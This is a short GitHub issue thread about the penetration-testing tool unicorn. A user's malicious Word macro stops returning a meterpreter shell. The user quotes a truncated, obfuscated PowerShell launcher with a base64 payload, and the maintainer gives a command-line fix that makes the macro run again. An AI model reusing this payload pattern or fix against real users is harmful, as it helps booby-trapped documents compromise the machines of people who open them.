### ISSUE TITLE
MS Office 2016 Macro doesn't work

### ISSUE THREAD

**Issue by Higgsx** [trustedsec/unicorn#84]
When I first used unicorn.py I successfully created macro enabled word document. But today I'm struggling to create this. I repeated the same steps but I don't have meterpreter shell. 

I debugged macro code and variable: "VJOsdb" is assigned to this: 

> "  /C "sv AvQ -;sv OC ec;sv Sp ((gv AvQ).value.toString()+(gv OC).value.toString());powershell (gv Sp).value.toString() ('JAByAHoAaAAgAD0AIAAnACQAcQBCACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAY

So, full base64 encoded powershell string is not fully assigned to "VJOsdb" variable. I don't know what to do and why it worked first time two days ago.

**Comment by trustedsec** [comment]
Was able to fix this, if you do " /w 1 /C instead of just /C it will work. I have a fix but also working on fixing the HTA as well.
